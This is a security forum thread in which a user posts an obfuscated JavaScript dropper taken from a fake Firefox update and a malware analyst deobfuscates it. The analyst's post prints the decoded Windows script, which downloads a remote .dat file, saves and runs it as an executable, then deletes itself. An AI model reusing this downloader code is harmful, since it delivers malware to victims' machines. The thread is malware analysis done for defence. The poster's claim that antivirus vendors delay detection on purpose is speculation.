Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Why are antivirus programs so slow to flag malware?


  • Please log in to reply
24 replies to this topic

#1 no_ice_please

no_ice_please

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:10:45 PM

Posted 10 August 2016 - 12:04 PM

I posted a variation of this elsewhere. I have an older computer that frequently gets misdirected to download fake firefox updates. I routinely submit them to virustotal and typically it takes several days before they begin to test positive.

 

The following javascript code came from https://feipinofa.nzzzzzet/4231654327224/1470796620751580/fireZZZZZfox-patch.js The ZZZZZ were added to break the link

 

In the following I have replaced the symbol [ with ZZZZZ

 

var ggudez='vmaprc gvdfejfpuzexjmeez=h\'z n{pymastiro swterAk=gnjezvriaXxcztncnebjttrOgbzclskWjrq(k"qSp.xtfhbiqpo)q"ilh;ietloesnt=fws rbeigtecgvz vAnjzbhOyeiexXiSy"n(fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy l;c=d"p)sAa iwycfnienXdexvuOwtqiutgcpez(ubtjfMdXlSkLu"bMxLjMzXjHl2d.y)e"dPh;cTiTpeqnm=mwk iddietpctve jAnjkbnOyeuehXaAs"r(zDbcdtcSa.hBgthOjDo"xmzaa)krkejlorouy=h;s hputctust"xhcetfq/tis:r/wfvosndabpain/qtxen1q.inx4a2w5l.y0e/e;g"zth bdsafedmmav=xffnmtuebGfSxbc.falitcclypjeke';var tcvj='wdklhrhFiomSm+p)ltu(q2e.zgunrfurriwhhClmxamrjoaerduot(urtCd"f+p)n1n9x2w.z5k4lel2e3b p;e"wfhxyenadvg(zrbosri;b1k=div fixiy;l5m+m<y=krity{vyt+j)zpvoz.der{gccEfGk"iTenl(brmun mlq"i,slnahfdsa,t c.kcb;asfev)knf(qdkujeinrbl;n)brulsln}v;fkacievai(ahicqedajtjcgSuWkrg)a{fSr.ftwlbippe5t(aps0uevek}i;q)p}i0z0lprOz.ueh ddd.qdj xTbnq;x=g hed cyjps.hdc tWz1x;o(keftfcaroieplsfeeof.nRhojBeerdgnfshde m;p.iyp)ztaiwsciuPwoa;j0h=g oohnubt(s a.xiyfoeeehlsxwFnix(dsstjftiasz)sebmv)vnwaslvefDzebbu.glwinFz';var xkvof='ewtkexmkapneed(lfs.adp lSk)i;mojTbenFfaxvkfy(sepnxiulj;e)rew eanmhnbuyrw(gab.i.zdcmxel"ncgcx/x i lxdegrvtbSzil"z+trufe.kornigyrzakhxCvmrCz3e(reb4cocdpajnafmms)l+qrythSrixet+rrrfo.vocnfgeraaehoCymaCf3x(fex4zohdafo,r0aab)j,m;r)heu jlesnpa vrb wvxahcaSyWlro=x mSu.utscsiupzFstipqusrkiamfacNhezlllm mfmii(o;j flvijFeehby.btustiwsmElxqbm)d)z.d(wpjtdeblmekDbey(xeolkpfFcitSlWx dcp)f;b.rtzpuEorlif"e(xojUecahfeoteah appdilypmmwejcroy)d"c.w;gtsebci k}aac y mei(dhk)rthcl w v p e{v}e\'m;uvraird ';var ujak='iyhfgwlyeknpemflvtoig=y"n4t5g2q1d0y3y"o;vvtadrz poizlkklzrujosiub=vyufgwiyyklpemnlstcia.lliernpggtphd;cvjahrb zsqsmpjnpcgfxnyai=svsfojapqzaxfmeet.hleefnqgvtuhx/koyzzktlfrajtsvun;cvlaurz jccwsmcxrttlthsiyxxsm=fZZZZZb]r,wlxrmitgicktsxcmp=tZZZZZv]l;gvxawra xag=d0p;ifvoirc(nvhazrz mia=r0j;yid<csgsnpunicdfondap;uia+m+u)x{s x n bcswwmdxgtdlchgiqxdsxZZZZZzic]b=bvifpjwpqztxkmtei.fsuuubzsstnrx(fao,qoczskxlfrvjdswuz)b;v b d xaj s+u=aomzfktlurkjospuk;g}cfiomrr(yvoajrw uie=a0r;dib<msfsfpknocxfenoaj;jii+e';var fjaur='+t)w{t e d wfmoqrn(kvfawrh amb=h0r;fmi<dokznkolzrljssouv;cmw+z+w)t{t a x p m nacqxbsvzweesobulqj=gyufnwryikbprmtlutfip.wcchpasrvAjts(tmy)f;g b c z b hlsrcisgccjtmxpmaZZZZZvmr]r=pclwxmexitzlthaivxcstZZZZZoib]y.vcchbaurdAitn(gabqpbpvoweeqojuwqi)y;h f c p}f w q bczwkmqxatillhdikxgshZZZZZsit]o=uljrdiigocttrxkmb.pjsohirni(m"o"y)n;n}ivdaorr posabuwlaquiqnowpvznr=xcnwlmoxytmldhqiuxvsy.gjkoxiunx(f"y"m)x;oveazrk fkujaatkjcalkrglojw=u"meivyaclc"u;atjheiyseZZZZZckdjcapkbcrltralbjz]v(cosaeudldqlirnzwgvdni)e;';var gce='f';var bboahfkbss=ggudez+tcvj+xkvof+ujak+fjaur+gce;   var e=new Error(2);   var t=e.number;   var uakenars="";   var riqrliooj=t;   var vdsyeadob=bboahfkbss.split("");   for (a=0;a<vdsyeadob.length;a +=riqrliooj){      uakenars=uakenars+vdsyeadobZZZZZa];}   var ycchmhvn=ZZZZZ"e","e","a","x","v","l","o"];   var xmodlrck=3-t;   var vhiwyzhho=ycchmhvnZZZZZxmodlrck]+ycchmhvnZZZZZ4]+ycchmhvnZZZZZ2]+ycchmhvnZZZZZ5];   var kbubebolwc=this;   var jksgjsorh=kbubebolwcZZZZZvhiwyzhho];   jksgjsorh(uakenars);           var axvqsxsjewcbr='qcncarncfkrbfifzybgnymsmbcaarftthdzvwjwmtqsbzgmlvhgtlsygtmnvuhcahtlqpfnfitgjrij sqeyzebpzztihvuxvzqvltsuglaetxeaj';

 

Here is the latest virus total, about 12 hours after the first submission https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470847259/ None of the av products detect it and it will probably be a week until half of them do. It seems there are a lot of unnecessary infections if it takes this long for obvious malware to get recognized. Maybe antivirus companies trying to keep demand for their products up?



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:45 AM

Posted 10 August 2016 - 12:20 PM

This JavaScript looks incomplete to me. Also, did you upload the payload it downloads on VirusTotal to see if it's flagged?

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:10:45 PM

Posted 10 August 2016 - 01:02 PM

This JavaScript looks incomplete to me. Also, did you upload the payload it downloads on VirusTotal to see if it's flagged?

Normally I can see a recognizable url, so I get the "payload" and upload it to virustotal. But in this case all I see in the script is gibberish, no clear url.

 

It is always a variation of cerber or ransomware that it gets detected as, so it's likely that's what this is. As of right now detection is still 0/54 https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470851923/

 

So there is no doubt people are getting infected.

 

Here is virustotal from a "payload" from a previous visit to the same redirect https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468528659/

 

Here is a previous javascript that brought a similar payload https://www.virustotal.com/en/file/7aa84de1772b3b7a67b10c06e64c89cbfe8b93fdf01f36dbc65b16599bdfb828/analysis/1470852857/

 

Are you able to see an encoded url in that? If you point it out I'll download and see what it is. I don't know any javascript so I don't know how to find the url in this last one.


Edited by no_ice_please, 10 August 2016 - 01:23 PM.


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:45 AM

Posted 10 August 2016 - 01:19 PM

This JS is obfuscated and I'm working on understanding the code right now. There's two things that don't make sense which makes me believe this code is incomplete:
for (a = 0; a < vdsyeadob.length; a += riqrliooj) {
    uakenars = uakenars + vdsyeadob[a];
}
vdsyeadob is a var that contains a large string built by assembling the first 5 strings in it and was split in individual char. However, this loop doesn't append the char to the uakenars variable, it only changes it's value every time (because it uses the = operation, which is assign, and not += which is append). So in the end, the uakenars var will only contain one character, which is pretty useless and doesn't make sense at all.

var axvqsxsjewcbr = 'qcncarncfkrbfifzybgnymsmbcaarftthdzvwjwmtqsbzgmlvhgtlsygtmnvuhcahtlqpfnfitgjrij sqeyzebpzztihvuxvzqvltsuglaetxeaj';
Last line, and that variable is never used anywhere else.

I'm also trying to understand what number riqrliooj is supposed to be. I think it's 2, though when I try with an online compiler, I get an Invalid string lenght error.

I'll keep trying though.

Do you have the original .js file?

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:10:45 PM

Posted 10 August 2016 - 01:26 PM

Yes I have the original, I just changed the name of the file to differentiate from other firefoxpatches that are all malicious. If you have a place to upload it I can.

 

The original though is just that text with a .js ending.


Edited by no_ice_please, 10 August 2016 - 01:29 PM.


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:45 AM

Posted 10 August 2016 - 01:26 PM

Please upload it to the link below.

http://www.bleepingcomputer.com/submit-malware.php?channel=194

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:10:45 PM

Posted 10 August 2016 - 01:31 PM

It has been submitted.



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:45 AM

Posted 10 August 2016 - 01:34 PM

Well, the code in that file matches the one I came up with when I replaced your ZZZZZ with [. I'll be seeking assistance from experts on that one, since I fail to see how that code works because it looks broken to me. Maybe I'm just not experienced enough yet to deobfuscate it. I'll keep you updated :)

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:45 AM

Posted 10 August 2016 - 03:55 PM

It looks like I'm getting somewhere, stay tuned!

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:45 AM

Posted 10 August 2016 - 04:06 PM

Alright so this was an interesting one :) Basically, it was a JavaScript that was also embedding JavaScript and executing it via eval(). Here's the dump of the vdsyeadob var.
var vfjpzxme = ' {yatr weA=neviXctcejtObcsWr("S.thip)"l;elen=w bitcv AjbOeeXS"(cctitpnriliFeg.etsmSycejtObc ;=")A wcneXevOtitce(bjMXSL"MLMXH2.)"P;TTen=w ditcv AjbOeeXA"(DctS.BtOD"ma)relru=; ptts"hef/i:/fonapi/te1.n425.0/;"t daema=fnteGSb.aiclpeedlrFoS+)t(2.gnfrihCmaroedo(rC"+)192.54e23 ;"fxeav(ror;1=i ii;5+<=rt{y+)po.e{cEG"Tn(ru l",lafs, .c;se)n(duenb;)rll};kcea(hceatcSWr){S.tlip5(p0ee};)}00pO.e d.d Tn;= e yp.d W1;(etcripseo.RoBednsd ;.y)tisiPo;0= onb( .ifeelxFi(stfis)em)naleDeb.liFetemane(f.d S);oTeFavf(enil;)e amnur(a..dme"cc/  xertSi"+rf.ongrahCmC3(e4odanfm)+rtSie+rf.ongrahCmC3(e4odf,0a),;)e lsp r vacSWr= S.tcipFtpurimaNell fi(; liFeb.tsisExb)).(pteleDe(elpFiSW c);.tpEri"(oUcheta pdlpmeco)".;tec }a  e(h)tc    {}';
var yfwykpmlti = "452103";
var ozklrjsu = yfwykpmlti.length;
var sspncfna = vfjpzxme.length / ozklrjsu;
var cwmxtlhixs = [],
    lrigctxm = [];
var a = 0;
for (var i = 0; i < sspncfna; i++) {
    cwmxtlhixs[i] = vfjpzxme.substr(a, ozklrjsu);
    a += ozklrjsu;
}
for (var i = 0; i < sspncfna; i++) {
    for (var m = 0; m < ozklrjsu; m++) {
        aqbvweouq = yfwykpmlti.charAt(m);
        lrigctxm[m] = cwmxtlhixs[i].charAt(aqbvweouq);
    }
    cwmxtlhixs[i] = lrigctxm.join("");
}
var oaulqinwvn = cwmxtlhixs.join("");
var kjakclrlj = "eval";
this[kjakclrlj](oaulqinwvn);
Still too obfuscated to be read properly, right? In that case, if we dump the content of the oaulqinwvn variable in the embedded JavaScript, we get this:
try {
    a = new ActiveXObject("Wscript.Shell");
    b = new ActiveXObject("Scripting.FileSystemObject");
    c = new ActiveXObject("MSXML2.XMLHTTP");
    d = new ActiveXObject("ADODB.Stream");
    url = "https://feipinofa.net/10/524.dat";
    fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
    for (var i = 1; i <= 5; i++) {
        try {
            c.open("GET", url, false);
            c.send(null);
            break;
        } catch (e) {
            WScript.Sleep(5000);
        }
    }
    d.Open;
    d.Type = 1;
    d.Write(c.ResponseBody);
    d.Position = 0;
    if (b.Fileexists(fname)) b.DeleteFile(fname);
    d.SaveToFile(fname);
    a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
    var p = WScript.ScriptFullName;
    if (b.FileExists(p)) b.DeleteFile(p);
    WScript.Echo("Update complete.");
} catch (e) {}
Way easier to read isn't it? The payload would be:
https://feipinofa.net/10/524.dat
The website seems to be offline at the moment, so I cannot harvest it.

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,086 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:08:45 AM

Posted 10 August 2016 - 04:17 PM

The problem with JS downloaders is that many have a short lifetime, and often the host (the hacked website) takes the malicious file down after a few hours or so. Once the file is gone, there is no point to add the JS downloader to detections as it cannot download anything.
 
The amount of malware which is submitted every day to an antivirus is in the 10s of thousands of files which all need checking to see whether it is malicious. This all takes time, and leads to the delays you see. Any good AV will have heuristic detection which means the majority of malware will be caught by that.
 
xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#12 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:10:45 PM

Posted 10 August 2016 - 10:20 PM

Thanks for the answers and sorry you ran around in circles for nothing.

 

What I still don't get is why there is not a database of cleartext malware. somebody with credibility, like one of you people on this site, could make a database of realtime submissions from antivirus companies. Listing the ones that cooperate would pressure those who don't. If, for example, virustotal submissions were available realtime to any antivirus company, infections would be reduced a lot.

 

A script that obfuscates the url it wants to download from should be malware just for that reason. Is there a legitimate reason for a js file to deliberately hide the website that is serving its file? I doubt it.

 

Anyway, thanks.



#13 sasschary

sasschary

  • Malware Study Hall Senior
  • 853 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:A galaxy far, far away...
  • Local time:03:45 AM

Posted 10 August 2016 - 10:47 PM

A database of cleartext malware would be difficult to come up with. To perform the same task, there are many different ways one could write the code. In addition, this code could also be used for legitimate purposes. There can also be legitimate purposes for having obfuscated URLs. For example, if I have a browser-based product written in JavaScript, but it is a paid software, I may wish to obfuscate the code and other things it downloads so that it is harder for my product to be reverse engineered and cracked.

 

ZC



#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:45 AM

Posted 11 August 2016 - 07:00 AM

All good, no worries :) Also, this thread is related to yours:

http://www.bleepingcomputer.com/forums/t/622438/malware-analysis-chr%D0%BEm%D0%B5-patch-1470326241hta

If, for example, virustotal submissions were available realtime to any antivirus company, infections would be reduced a lot.


AV companies already have access to VT.

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:10:45 PM

Posted 11 August 2016 - 11:54 AM

All good, no worries :) Also, this thread is related to yours:

http://www.bleepingcomputer.com/forums/t/622438/malware-analysis-chr%D0%BEm%D0%B5-patch-1470326241hta
 

If, for example, virustotal submissions were available realtime to any antivirus company, infections would be reduced a lot.


AV companies already have access to VT.

 

 

 Could you give me your opinion then of a reasonable time frame for major anti virus programs to continue ignoring executables like https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468528659/ ? I don't have the original exe of that one but next time I get one I'll post it and show how slow it updates.

 

There clearly is something problematic with the process if "AV companies already have access to VT."

 

There is either a deliberate roadblock in the process, perhaps to make sure infections stay high enough to sustain demand for AV products, or something else that makes the process inefficient.

 

Can you explain why Comodo called this file clean on 2016-07-22?

 

2016-07-13 https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468437027/

 

2016-07-14 https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468528659/

 

2016-07-22 https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users